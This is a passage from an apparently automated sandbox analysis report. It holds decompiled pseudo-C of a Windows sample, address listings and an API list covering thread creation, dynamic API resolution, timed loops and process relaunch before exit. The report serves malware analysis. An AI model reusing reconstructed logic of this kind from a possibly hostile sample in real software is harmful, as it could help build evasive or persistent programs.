								_t324 =  *(_t239 + 0x54);
								_t334 = _t334 + 8;
								_t290 = 0;
								_v12 = _t324;
								__eflags = _t324;
								if(_t324 <= 0) {
									L29:
									__eflags = _t290 - _t324;
									if(_t290 != _t324) {
										goto L48;
									}
									_t242 = E003A1D90( *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x54) + 1 << 4,  *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x50));
									_t336 = _t334 + 8;
									__eflags = _t242;
									if(_t242 != 0) {
										 *((intOrPtr*)(_t242 +  *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x54) * 4)) = _v20;
										 *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x50) = _t242;
										 *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x54) =  *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x54) + 1;
									}
									goto L42;
								}
								_t245 =  *((intOrPtr*)(_t239 + 0x50));
								while(1) {
									__eflags =  *_t245 - _v20;
									_t324 = _v12;
									if( *_t245 == _v20) {
										goto L29;
									}
									_t290 = _t290 + 1;
									_t245 = _t245 + 4;
									__eflags = _t290 - _t324;
									if(_t290 < _t324) {
										continue;
									}
									goto L29;
								}
								goto L29;
							}
							E003A19B0(_t333, _t252);
						}
						L48:
						_t332 = _t332 + 1;
					} while (_t332 <  *_t333);
					if(_t252 != 0) {
						_t189 =  *_t252;
						if( *_t252 != 0) {
							E0039BB40(_t189);
							_t334 = _t334 + 4;
						}
						_t190 =  *(_t252 + 4);
						if( *(_t252 + 4) != 0) {
							E0039BB40(_t190);
							_t334 = _t334 + 4;
						}
						_t191 =  *(_t252 + 8);
						if( *(_t252 + 8) != 0) {
							E0039BB40(_t191);
							_t334 = _t334 + 4;
						}
						_t192 =  *(_t252 + 0x10);
						if( *(_t252 + 0x10) != 0) {
							E0039BB40(_t192);
							_t334 = _t334 + 4;
						}
						_t193 =  *(_t252 + 0xc);
						if( *(_t252 + 0xc) != 0) {
							E0039BB40(_t193);
							_t334 = _t334 + 4;
						}
						E0039BB40(_t252);
					}
					goto L61;
				}
			}




























































    0x0039a59c
    0x0039a59e
    0x0039a5a0
    0x0039a5a4
    0x0039a98a
    0x0039a993
    0x0039a5b0
    0x0039a5b0
    0x0039a5b2
    0x0039a5c3
    0x0039a5c5
    0x0039a5c7
    0x0039a5ca
    0x0039a5cf
    0x0039a5cf
    0x0039a5d2
    0x0039a5d5
    0x0039a5d7
    0x0039a5da
    0x0039a5df
    0x0039a5df
    0x0039a5e2
    0x0039a5e5
    0x0039a5e7
    0x0039a5ea
    0x0039a5ef
    0x0039a5ef
    0x0039a5f2
    0x0039a5f5
    0x0039a5f7
    0x0039a5fa
    0x0039a5ff
    0x0039a5ff
    0x0039a602
    0x0039a605
    0x0039a607
    0x0039a60a
    0x0039a60f
    0x0039a60f
    0x00000000
    0x0039a5b4
    0x0039a5b7
    0x0039a5bc
    0x0039a5bf
    0x0039a612
    0x0039a614
    0x0039a616
    0x0039a619
    0x0039a61c
    0x0039a61f
    0x0039a623
    0x0039a626
    0x0039a629
    0x0039a62d
    0x0039a630
    0x0039a634
    0x0039a63b
    0x0039a642
    0x0039a650
    0x0039a653
    0x0039a65c
    0x0039a65e
    0x00000000
    0x00000000
    0x0039a664
    0x0039a666
    0x00000000
    0x00000000
    0x0039a678
    0x0039a67f
    0x0039a686
    0x0039a68e
    0x0039a693
    0x0039a69c
    0x0039a6a3
    0x0039a6a8
    0x0039a6c3
    0x0039a6cb
    0x0039a6d1
    0x0039a6e2
    0x0039a6e4
    0x0039a6e6
    0x0039a7ab
    0x0039a7b3
    0x0039a7b9
    0x0039a7ca
    0x0039a7cc
    0x0039a7ce
    0x0039a7fc
    0x0039a7ff
    0x0039a804
    0x0039a80b
    0x0039a80e
    0x0039a811
    0x0039a84c
    0x0039a84c
    0x0039a84f
    0x0039a852
    0x0039a855
    0x0039a858
    0x0039a89e
    0x0039a8a5
    0x0039a8a8
    0x0039a8ad
    0x0039a8bc
    0x0039a8ca
    0x0039a8cc
    0x0039a8ce
    0x0039a8d1
    0x00000000
    0x00000000
    0x0039a8d3
    0x0039a8d6
    0x0039a8d8
    0x0039a996
    0x0039a9a8
    0x0039a9ad
    0x0039a9b0
    0x0039a9b3
    0x0039a9b5
    0x0039a913
    0x0039a913
    0x0039a916
    0x0039a918
    0x0039a91b
    0x0039a920
    0x0039a920
    0x00000000
    0x0039a918
    0x0039a9c4
    0x0039a9cb
    0x0039a9ce
    0x0039a9d7
    0x0039a9e0
    0x0039a9e3
    0x0039a9e5
    0x0039a9ec
    0x0039a9f6
    0x0039a9ff
    0x0039aa02
    0x00000000
    0x0039aa02
    0x0039a8de
    0x0039a8e1
    0x0039a8e4
    0x0039a8e7
    0x00000000
    0x00000000
    0x0039a8ee
    0x0039a8f4
    0x0039a900
    0x0039a903
    0x0039a906
    0x0039a906
    0x0039a908
    0x0039a90f
    0x00000000
    0x0039a90f
    0x0039a85c
    0x0039a865
    0x0039a873
    0x0039a876
    0x0039a876
    0x0039a87a
    0x0039a880
    0x0039a884
    0x0039a887
    0x0039a88a
    0x00000000
    0x00000000
    0x0039a890
    0x00000000
    0x00000000
    0x0039a892
    0x0039a898
    0x00000000
    0x00000000
    0x00000000
    0x0039a898
    0x0039a813
    0x0039a816
    0x0039a823
    0x0039a830
    0x0039a832
    0x0039a834
    0x00000000
    0x00000000
    0x0039a83c
    0x0039a83f
    0x0039a843
    0x0039a844
    0x0039a847
    0x0039a84a
    0x00000000
    0x00000000
    0x00000000
    0x0039a84a
    0x00000000
    0x0039a816
    0x0039a7d5
    0x0039a7df
    0x0039a7f2
    0x0039a7f4
    0x0039a7f6
    0x00000000
    0x00000000
    0x00000000
    0x0039a7f6
    0x0039a6ec
    0x0039a6ef
    0x0039a6f1
    0x00000000
    0x00000000
    0x0039a6f7
    0x0039a6f9
    0x00000000
    0x00000000
    0x0039a700
    0x0039a700
    0x0039a705
    0x00000000
    0x00000000
    0x0039a707
    0x0039a708
    0x0039a70c
    0x00000000
    0x00000000
    0x00000000
    0x0039a70c
    0x0039a70e
    0x0039a711
    0x0039a717
    0x00000000
    0x00000000
    0x0039a724
    0x0039a72a
    0x0039a72d
    0x0039a730
    0x0039a733
    0x0039a735
    0x0039a738
    0x0039a73a
    0x0039a752
    0x0039a752
    0x0039a754
    0x00000000
    0x00000000
    0x0039a76c
    0x0039a771
    0x0039a774
    0x0039a776
    0x0039a788
    0x0039a791
    0x0039a79a
    0x0039a79a
    0x00000000
    0x0039a776
    0x0039a73c
    0x0039a740
    0x0039a743
    0x0039a745
    0x0039a748
    0x00000000
    0x00000000
    0x0039a74a
    0x0039a74b
    0x0039a74e
    0x0039a750
    0x00000000
    0x00000000
    0x00000000
    0x0039a750
    0x00000000
    0x0039a740
    0x0039a6ad
    0x0039a6ad
    0x0039a923
    0x0039a923
    0x0039a924
    0x0039a92e
    0x0039a930
    0x0039a934
    0x0039a937
    0x0039a93c
    0x0039a93c
    0x0039a93f
    0x0039a944
    0x0039a947
    0x0039a94c
    0x0039a94c
    0x0039a94f
    0x0039a954
    0x0039a957
    0x0039a95c
    0x0039a95c
    0x0039a95f
    0x0039a964
    0x0039a967
    0x0039a96c
    0x0039a96c
    0x0039a96f
    0x0039a974
    0x0039a977
    0x0039a97c
    0x0039a97c
    0x0039a980
    0x0039a985
    0x00000000
    0x0039a92e

    APIs
      • Part of subcall function 00394F50: memcpy.MSVCRT ref: 00394FC8
      • Part of subcall function 00394F50: memcpy.MSVCRT ref: 00394FE5
    • _time64.MSVCRT ref: 0039A85C
    • CreateThread.KERNEL32(00000000,00000000,Function_000044B0,00000000,00000000,?), ref: 0039A8CA
    • _time64.MSVCRT ref: 0039A8EE
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • _time64.MSVCRT ref: 0039A9CE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039FD69, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150
    C-Code - Quality: 52%
    			E0039FD69() {
				void* _t181;
				void* _t188;
				signed int* _t198;
				int _t207;
				int _t212;
				int _t214;
				int _t218;
				int _t219;
				int _t221;
				int _t224;
				void* _t226;
				int _t230;
				int _t231;
				int _t233;
				int _t235;
				int _t236;
				int _t237;
				int _t238;
				int _t242;
				int _t243;
				int _t247;
				int _t249;
				int _t255;
				int _t261;
				int _t263;
				int _t264;
				int _t266;
				int _t276;
				int _t281;
				intOrPtr _t282;
				int _t283;
				signed int* _t290;
				int _t293;
				signed int _t313;
				signed int _t316;
				signed int _t332;
				int _t337;
				int _t352;
				signed int _t354;
				int _t361;
				int _t363;
				int _t364;
				int _t365;
				signed short* _t366;
				int _t371;
				signed int _t372;
				int _t377;
				int _t383;
				signed int _t385;
				signed int _t392;
				int _t394;
				int _t395;
				void* _t396;
				void* _t398;
				int _t399;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;
				void* _t405;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t412;
				void* _t415;

				E00392420(_t397);
				L00391CB0();
				_t402 = _t401 + 4;
				_t293 =  *0x3b8628; // 0x593938
				 *0x3b8570 = _t289;
				 *0x3b8584 = _t289;
				 *0x3b8574 = _t289;
				 *0x3b8578 = _t289;
				 *((intOrPtr*)( *((intOrPtr*)(_t293 + 0xcc))))(0x3b8594, 0x800, _t397);
				E00391B20(_t400 - 0x5c0,  *((intOrPtr*)(_t293 + 0xcc)), _t412);
				_t181 = E0039BB30(_t400 - 0xc);
				_push(0x34);
				 *(_t400 - 0x58) = _t289;
				 *(_t400 - 0x28) = _t289;
				L0039A47E();
				_t403 = _t402 + 4;
				_t413 = _t181 - _t289;
				if(_t181 == _t289) {
					 *(_t400 - 0x5b8) = _t289;
				} else {
					 *(_t400 - 0x5b8) = E003970B0(_t181);
				}
				E00399090(_t413, _t400 - 0x9c0, 3);
				E0039F550(_t400 - 0x50, _t289, _t400 - 0x9c0, 0xa, _t400 - 0x54, _t400 - 0x50);
				E00391F00(_t400 - 0xc,  *((intOrPtr*)(_t400 - 0x54)),  *((intOrPtr*)(_t400 - 0x50))); // executed
				_t188 = E003969F0(_t400 - 0x5b8, _t400 - 0xc, _t400 - 0x5b8); // executed
				_t405 = _t403 + 0x24;
				if(_t188 != 0) {
					 *(_t400 - 0x5c0) = _t400 - 0xc;
					__eflags = E003A0AD0(_t400 - 0x5c0,  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x14)));
					if(__eflags == 0) {
						goto L5;
					} else {
						E00395700( *((intOrPtr*)(_t400 - 0x5bc)), __eflags);
						 *0x3b85ac = _t289;
						 *(_t400 - 0x30) = _t289;
						 *(_t400 - 0x2c) = _t289;
						 *(_t400 - 0x14) = _t289;
						 *(_t400 - 0x10) = _t289;
						 *(_t400 - 0x3c) = _t289;
						 *(_t400 - 0x38) = _t289;
						 *(_t400 - 0x44) = _t289;
						 *(_t400 - 0x40) = _t289;
						 *((intOrPtr*)( *( *0x3b8628)))(_t289, _t289, E003B08A0, _t400 - 0x5c0, _t289, _t400 - 0x74);
						 *(_t400 - 0x24) = _t289;
						while(1) {
							_t212 =  *(_t400 - 0x5b8);
							_t316 = 0;
							 *0x3b857c = 0;
							 *(_t400 - 0x20) = _t289;
							__eflags =  *((intOrPtr*)(_t212 + 0x18)) - _t289;
							if(__eflags <= 0) {
								goto L72;
							}
							do {
								_t371 =  *( *((intOrPtr*)(_t212 + 0x20)) + _t316 * 4);
								_t218 = L003994D0(_t400 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x1c)) + _t316 * 4)), _t371); // executed
								__eflags = _t218;
								if(_t218 != 0) {
									__imp___time64(_t289);
									_t395 = _t371;
									_t372 =  *0x3b857c; // 0x1
									_t408 = _t405 + 4;
									_t397 = _t218;
									_t219 = _t218 -  *((intOrPtr*)( *((intOrPtr*)( *(_t400 - 0x5b8) + 0x24)) + _t372 * 8));
									__eflags = _t219;
									asm("sbb ebx, [ecx+edx*8+0x4]");
									 *(_t400 - 0x48) = _t395;
									if(__eflags < 0) {
										L20:
										_t289 = 0; // executed
										_t221 = E003A1B80(_t397, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x28); // executed
										_t405 = _t408 + 0xc;
										__eflags = _t221;
										if(_t221 == 0) {
											 *(_t400 - 0x20) =  *(_t400 - 0x20) + 1;
											 *( *((intOrPtr*)(_t400 - 0x5bc)) + 0xc) =  *(_t400 - 0x28);
											_t224 = _t397 -  *(_t400 - 0x3c);
											__eflags = _t224;
											asm("sbb edx, [ebp-0x38]");
											 *(_t400 - 0x48) = _t395;
											if(__eflags < 0) {
												L29:
												E003942A0(__eflags, _t400 - 0x5c0); // executed
												_t409 = _t405 + 4;
												_t226 = E003A12C0(); // executed
												_push(4);
												__eflags = _t226 - _t289;
												if(__eflags >= 0) {
													if(__eflags != 0) {
														_push(_t400 - 0x9c0);
														E00399090(__eflags);
														E00399090(__eflags, _t400 - 0xdc0, 7);
														_push(_t400 - 0xdc0);
														_push(_t400 - 0x9c0);
														_push(0xe);
														_t377 = _t400 - 0x5c0;
														_push(_t377); // executed
													} else {
														_push(_t400 - 0x9c0);
														E00399090(__eflags);
														E00399090(__eflags, _t400 - 0xdc0, 6);
														_push(_t400 - 0xdc0);
														_t377 = _t400 - 0x9c0;
														_push(_t377);
														_push(0xe);
														_push(_t400 - 0x5c0);
													}
												} else {
													_push(_t400 - 0x9c0);
													E00399090(__eflags);
													E00399090(__eflags, _t400 - 0xdc0, 5);
													_t377 = _t400 - 0xdc0;
													_push(_t377);
													_push(_t400 - 0x9c0);
													_push(0xe);
													_push(_t400 - 0x5c0);
												}
												_t230 = E00395A10(); // executed
												_t410 = _t409 + 0x20;
												 *(_t400 - 0x48) = _t289;
												do {
													__imp___time64(0);
													_t397 = _t230;
													_t231 =  *0x3b8570; // 0x0
													_t405 = _t410 + 4;
													_t395 = _t377;
													__eflags = _t231 - 2;
													if(_t231 == 2) {
														L39:
														_t233 = E003936E0(_t395, _t397, _t400 - 0xc, _t400 - 0x5c0,  *(_t400 - 0x14),  *(_t400 - 0x10)); // executed
														_t405 = _t405 + 0x10;
														asm("sbb edx, 0x0");
														 *(_t400 - 0x14) = _t397 - 0x708;
														 *(_t400 - 0x10) = _t395;
														__eflags = _t233 - 1;
														if(_t233 == 1) {
															 *0x3b85ac = _t233;
														}
														L41:
														_t235 = _t397 -  *(_t400 - 0x44);
														__eflags = _t235;
														asm("sbb ecx, [ebp-0x40]");
														 *(_t400 - 0x5c) = _t395;
														if(__eflags < 0) {
															L48:
															_t397 = _t397 -  *(_t400 - 0x30);
															__eflags = _t397;
															asm("sbb edi, [ebp-0x2c]");
															 *(_t400 - 0x5c) = _t395;
															if(__eflags < 0) {
																L55:
																_t236 = E00399890( *((intOrPtr*)(_t400 - 0x5bc)));
																__eflags = _t236;
																if(_t236 == 0) {
																	L70:
																	_t289 = 0;
																	__eflags = 0;
																	goto L71;
																}
																_push(1);
																_push(_t400 - 0x5c0);
																_t237 = E00395A10();
																_t405 = _t405 + 8;
																__eflags = _t237;
																if(__eflags == 0) {
																	goto L70;
																}
																_t377 = _t400 - 0x5c0;
																_t238 = E00397560(_t289, __eflags, _t377);
																_t405 = _t405 + 4;
																__eflags = _t238;
																if(_t238 == 0) {
																	__eflags =  *0x3b85ac;
																	if( *0x3b85ac != 0) {
																		L75:
																		E00391700(_t400 - 0xc);
																		E0039F850(_t289, _t400 - 0x5c0);
																		E0039C930(_t400 - 4);
																		_t289 = 0;
																		__eflags = 0;
																		L76:
																		_t415 =  *0x3b85ac - _t289; // 0x0
																		if(_t415 == 0) {
																			L89:
																			E00399480();
																			E00397E10();
																			ExitProcess(_t289);
																		}
																		_t361 =  *0x3b8628; // 0x593938
																		_t398 = 0;
																		 *((intOrPtr*)(_t400 - 0x70)) = 0;
																		 *((intOrPtr*)(_t400 - 0x6c)) = 0;
																		 *((intOrPtr*)(_t400 - 0x68)) = 0;
																		 *((intOrPtr*)(_t400 - 0x64)) = 0;
																		 *(_t400 - 0x18) = 0;
																		 *((intOrPtr*)(_t400 - 0xb8)) = 0x44;
																		 *((intOrPtr*)( *((intOrPtr*)(_t361 + 0xb8))))(_t400 - 0xb8);
																		E00398030(_t400 - 0x18);
																		_t198 = E003A1D90(0x20a, 0);
																		_t290 = _t198;
																		if(_t290 == 0) {
																			L88:
																			_t363 =  *0x3b8628; // 0x593938
																			 *((intOrPtr*)( *((intOrPtr*)(_t363 + 0xd8))))( *(_t400 - 0x18), _t398, _t398, _t398, _t398, _t398, _t398, _t290, _t400 - 0xb8, _t400 - 0x70);
																			_t364 =  *0x3b8628; // 0x593938
																			 *((intOrPtr*)( *((intOrPtr*)(_t364 + 0xf8))))( *((intOrPtr*)(_t400 - 0x70)));
																			_t365 =  *0x3b8628; // 0x593938
																			 *((intOrPtr*)( *((intOrPtr*)(_t365 + 0xf8))))( *((intOrPtr*)(_t400 - 0x6c)));
																			E0039BB40( *(_t400 - 0x18));
																			_t289 = 0;
																			goto L89;
																		}
																		_t366 =  *(_t400 - 0x18);
																		_t399 = 0x104;
																		_t396 = 0;
																		while(1) {
																			_t167 = _t399 + 0x7ffffefa; // 0x7ffffffe
																			if(_t167 == 0) {
																				break;
																			}
																			_t313 =  *_t366 & 0x0000ffff;
																			if(_t313 == 0) {
																				break;
																			}
																			 *_t198 = _t313;
																			_t198 =  &(_t198[0]);
																			_t366 =  &(_t366[1]);
																			_t399 = _t399 - 1;
																			if(_t399 != 0) {
																				continue;
																			}
																			L84:
																			_t198 = _t198 - 2;
																			_t396 = 0x8007007a;
																			L85:
																			 *_t198 = 0;
																			if(_t396 >= 0) {
																				_t207 =  *0x3b8628; // 0x593938
																				 *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x1e8))))(_t290);
																			}
																			_t398 = 0;
																			goto L88;
																		}
																		__eflags = _t399;
																		if(_t399 != 0) {
																			goto L85;
																		}
																		goto L84;
																	}
																	goto L70;
																}
																__eflags =  *0x3b85ac;
																if( *0x3b85ac != 0) {
																	goto L75;
																}
																_t242 =  *0x3b8584; // 0x1
																_t397 = 0xa;
																__eflags = _t242;
																if(_t242 == 0) {
																	_t243 =  *(_t400 - 0x24);
																	__eflags = _t243;
																	if(_t243 <= 0) {
																		while(1) {
																			L63:
																			_t337 =  *0x3b8584; // 0x1
																			__eflags = _t337;
																			if(_t337 != 0) {
																				goto L65;
																			}
																			_t377 =  *0x3b8628; // 0x593938
																			 *((intOrPtr*)( *((intOrPtr*)(_t377 + 0xc8))))(0x4e20);
																			_t397 = _t397 - 1;
																			__eflags = _t397;
																			if(_t397 > 0) {
																				continue;
																			}
																			goto L65;
																		}
																		goto L65;
																	}
																	L62:
																	_t247 = _t243 - 1;
																	__eflags = _t247;
																	 *(_t400 - 0x24) = _t247;
																	_t397 = 1;
																	goto L63;
																}
																_t138 = _t397 - 5; // 0x5
																_t243 = _t138;
																 *0x3b8584 = 0;
																goto L62;
															}
															if(__eflags > 0) {
																L51:
																_t397 = E0039F2D0(_t400 - 0x5c0);
																_t249 = E003999A0(_t289, _t400 - 0x19, _t395, _t248, _t248);
																_push(8);
																__eflags = _t249;
																if(__eflags == 0) {
																	_push(_t400 - 0x9c0);
																	E00399090(__eflags);
																	E00399090(__eflags, _t400 - 0xdc0, 0xa);
																	_push(_t400 - 0xdc0);
																	_t383 = _t400 - 0x9c0;
																	_push(_t383);
																	_push(0xe);
																	_push(_t400 - 0x5c0);
																} else {
																	_push(_t400 - 0x9c0);
																	E00399090(__eflags);
																	E00399090(__eflags, _t400 - 0xdc0, 9);
																	_t383 = _t400 - 0xdc0;
																	_push(_t383);
																	_push(_t400 - 0x9c0);
																	_push(0xe);
																	_push(_t400 - 0x5c0);
																}
																E00395A10();
																_t255 = E0039BB40(_t397);
																__imp___time64(0);
																_t405 = _t405 + 0x28;
																 *(_t400 - 0x30) = _t255;
																 *(_t400 - 0x2c) = _t383;
																goto L55;
															}
															__eflags = _t397 - 0x7080;
															if(_t397 <= 0x7080) {
																goto L55;
															}
															goto L51;
														}
														if(__eflags > 0) {
															L44:
															_t385 =  *0x3b857c; // 0x1
															_t261 = _t397 -  *((intOrPtr*)( *((intOrPtr*)( *(_t400 - 0x5b8) + 0x28)) + _t385 * 8));
															__eflags = _t261;
															_t289 = _t395;
															asm("sbb ebx, [ecx+edx*8+0x4]");
															 *(_t400 - 0x5c) = _t395;
															if(__eflags < 0) {
																goto L48;
															}
															if(__eflags > 0) {
																L47:
																 *(_t400 - 0x44) = _t397;
																 *(_t400 - 0x40) = _t395;
																_t263 = E00391FE0(_t289, _t395, _t397, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x5b8); // executed
																_t405 = _t405 + 0xc;
																__eflags = _t263;
																if(_t263 != 0) {
																	_t264 = E003A0AD0(_t400 - 0x5c0,  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x14)));
																	__eflags = _t264;
																	if(_t264 == 0) {
																		goto L75;
																	}
																	 *0x3b857c = 0;
																	goto L70;
																}
																goto L48;
															}
															__eflags = _t261 - 0x3840;
															if(_t261 <= 0x3840) {
																goto L48;
															}
															goto L47;
														}
														__eflags = _t235 - 0x4b0;
														if(_t235 <= 0x4b0) {
															goto L48;
														}
														goto L44;
													}
													_t266 = _t397 -  *(_t400 - 0x14);
													__eflags = _t266;
													asm("sbb ecx, [ebp-0x10]");
													 *(_t400 - 0x5c) = _t395;
													if(__eflags < 0) {
														goto L41;
													}
													if(__eflags > 0) {
														goto L39;
													}
													__eflags = _t266 - 0xe10;
													if(_t266 <= 0xe10) {
														goto L41;
													}
													goto L39;
													L65:
													_t230 =  *(_t400 - 0x48) + 1;
													 *(_t400 - 0x48) = _t230;
													__eflags = _t230 - 0x64;
												} while (_t230 < 0x64);
												goto L70;
											}
											if(__eflags > 0) {
												L27:
												_t276 = E0039AC90( *(_t400 - 0x5b8), _t400 - 0x5c0); // executed
												_t405 = _t405 + 8;
												__eflags = _t276;
												if(__eflags == 0) {
													goto L71;
												}
												 *(_t400 - 0x3c) = _t397;
												 *(_t400 - 0x38) = _t395;
												goto L29;
											}
											__eflags = _t224 - 0xe10;
											if(__eflags <= 0) {
												goto L29;
											}
											goto L27;
										}
										__eflags = _t221 - 1;
										if(_t221 != 1) {
											E0039C870(_t400 - 0x5c0, _t221);
											_t405 = _t405 + 8;
										}
										_t352 =  *0x3b8628; // 0x593938
										 *((intOrPtr*)( *((intOrPtr*)(_t352 + 0xc8))))(0x3e8);
										goto L71;
									}
									if(__eflags > 0) {
										L15:
										_t281 = E0039D890(_t397, __eflags, _t400 - 0xc, _t400 - 0x5c0, _t400 - 0x58); // executed
										_t408 = _t408 + 0xc;
										__eflags = _t281;
										if(_t281 == 0) {
											_t282 =  *((intOrPtr*)( *(_t400 - 0x5b8) + 0x24));
											_t354 =  *0x3b857c; // 0x1
											 *(_t282 + _t354 * 8) = _t397;
											_t392 =  *0x3b857c; // 0x1
											 *(_t282 + 4 + _t392 * 8) = _t395;
											goto L20;
										}
										__eflags = _t281 - 1;
										if(_t281 != 1) {
											E0039C870(_t400 - 0x5c0, _t281);
											_t405 = _t408 + 8;
										}
										_t283 =  *0x3b8628; // 0x593938
										 *((intOrPtr*)( *((intOrPtr*)(_t283 + 0xc8))))(0x3e8);
										goto L70;
									}
									__eflags = _t219 - 0x3840;
									if(__eflags <= 0) {
										goto L20;
									}
									goto L15;
								}
								_t394 =  *0x3b8628; // 0x593938
								 *((intOrPtr*)( *((intOrPtr*)(_t394 + 0xc8))))(0x3e8);
								L71:
								_t332 =  *0x3b857c; // 0x1
								_t212 =  *(_t400 - 0x5b8);
								_t316 = _t332 + 1;
								 *0x3b857c = _t316;
								__eflags = _t316 -  *((intOrPtr*)(_t212 + 0x18));
							} while (__eflags < 0);
							L72:
							_t214 = E003B0A40(_t395, _t397, __eflags, _t400 - 0xc, _t400 - 0x5b8);
							_t405 = _t405 + 8;
							__eflags = _t214;
							if(_t214 == 0) {
								__eflags =  *(_t400 - 0x20) - _t289;
								if(__eflags == 0) {
									L003B0D30(_t289, _t395, _t397, __eflags, _t400 - 0xc, _t400 - 0x5c0);
									_t405 = _t405 + 8;
								}
							}
						}
					}
				}
				L5:
				E00391700(_t400 - 0xc);
				E0039F850(_t289, _t400 - 0x5c0);
				E0039C930(_t400 - 4);
				goto L76;
			}




































































    0x0039fd6b
    0x0039fd71
    0x0039fd76
    0x0039fd79
    0x0039fd7f
    0x0039fd8a
    0x0039fd90
    0x0039fd96
    0x0039fda7
    0x0039fdaf
    0x0039fdb7
    0x0039fdbc
    0x0039fdbe
    0x0039fdc1
    0x0039fdc4
    0x0039fdc9
    0x0039fdcc
    0x0039fdce
    0x0039fddf
    0x0039fdd0
    0x0039fdd7
    0x0039fdd7
    0x0039fdee
    0x0039fe05
    0x0039fe18
    0x0039fe28
    0x0039fe2d
    0x0039fe32
    0x0039fe5d
    0x0039fe72
    0x0039fe74
    0x00000000
    0x0039fe76
    0x0039fe7c
    0x0039fe99
    0x0039fea2
    0x0039fea5
    0x0039fea8
    0x0039feab
    0x0039feae
    0x0039feb1
    0x0039feb4
    0x0039feb7
    0x0039feba
    0x0039febc
    0x0039fec0
    0x0039fec0
    0x0039fec6
    0x0039fec8
    0x0039fece
    0x0039fed1
    0x0039fed4
    0x00000000
    0x00000000
    0x0039fee0
    0x0039fee3
    0x0039fef4
    0x0039fef9
    0x0039fefb
    0x0039ff16
    0x0039ff25
    0x0039ff27
    0x0039ff2d
    0x0039ff30
    0x0039ff32
    0x0039ff32
    0x0039ff37
    0x0039ff3b
    0x0039ff3e
    0x0039ffac
    0x0039ffbb
    0x0039ffbd
    0x0039ffc2
    0x0039ffc5
    0x0039ffc7
    0x0039ffff
    0x003a0002
    0x003a0007
    0x003a0007
    0x003a000c
    0x003a000f
    0x003a0012
    0x003a0041
    0x003a0048
    0x003a004d
    0x003a0053
    0x003a0058
    0x003a005a
    0x003a005c
    0x003a0091
    0x003a00cc
    0x003a00cd
    0x003a00db
    0x003a00e6
    0x003a00ed
    0x003a00ee
    0x003a00f0
    0x003a00f6
    0x003a0093
    0x003a0099
    0x003a009a
    0x003a00a8
    0x003a00b3
    0x003a00b4
    0x003a00ba
    0x003a00bb
    0x003a00c3
    0x003a00c3
    0x003a005e
    0x003a0064
    0x003a0065
    0x003a0073
    0x003a0078
    0x003a007e
    0x003a0085
    0x003a0086
    0x003a008e
    0x003a008e
    0x003a00f7
    0x003a00fc
    0x003a00ff
    0x003a0102
    0x003a0104
    0x003a010a
    0x003a010c
    0x003a0111
    0x003a0114
    0x003a0116
    0x003a0119
    0x003a0133
    0x003a0146
    0x003a014b
    0x003a0158
    0x003a015b
    0x003a015e
    0x003a0161
    0x003a0164
    0x003a0166
    0x003a0166
    0x003a016b
    0x003a016d
    0x003a016d
    0x003a0172
    0x003a0175
    0x003a0178
    0x003a01d3
    0x003a01d3
    0x003a01d3
    0x003a01d6
    0x003a01d9
    0x003a01dc
    0x003a028f
    0x003a0295
    0x003a029a
    0x003a029c
    0x003a0372
    0x003a0372
    0x003a0372
    0x00000000
    0x003a0372
    0x003a02a8
    0x003a02aa
    0x003a02ab
    0x003a02b0
    0x003a02b3
    0x003a02b5
    0x00000000
    0x00000000
    0x003a02bb
    0x003a02c2
    0x003a02c7
    0x003a02ca
    0x003a02cc
    0x003a0369
    0x003a0370
    0x003a03cc
    0x003a03cf
    0x003a03da
    0x003a03e2
    0x003a03e7
    0x003a03e7
    0x003a03e9
    0x003a03e9
    0x003a03ef
    0x003a04eb
    0x003a04eb
    0x003a04f0
    0x003a04f6
    0x003a04f6
    0x003a03f5
    0x003a03fb
    0x003a0403
    0x003a0406
    0x003a0409
    0x003a040c
    0x003a040f
    0x003a0412
    0x003a0423
    0x003a0429
    0x003a0434
    0x003a0439
    0x003a0440
    0x003a0495
    0x003a049c
    0x003a04b7
    0x003a04bc
    0x003a04c9
    0x003a04ce
    0x003a04db
    0x003a04e1
    0x003a04e9
    0x00000000
    0x003a04e9
    0x003a0442
    0x003a0445
    0x003a044a
    0x003a0450
    0x003a0450
    0x003a0458
    0x00000000
    0x00000000
    0x003a045a
    0x003a0460
    0x00000000
    0x00000000
    0x003a0462
    0x003a0465
    0x003a0468
    0x003a046b
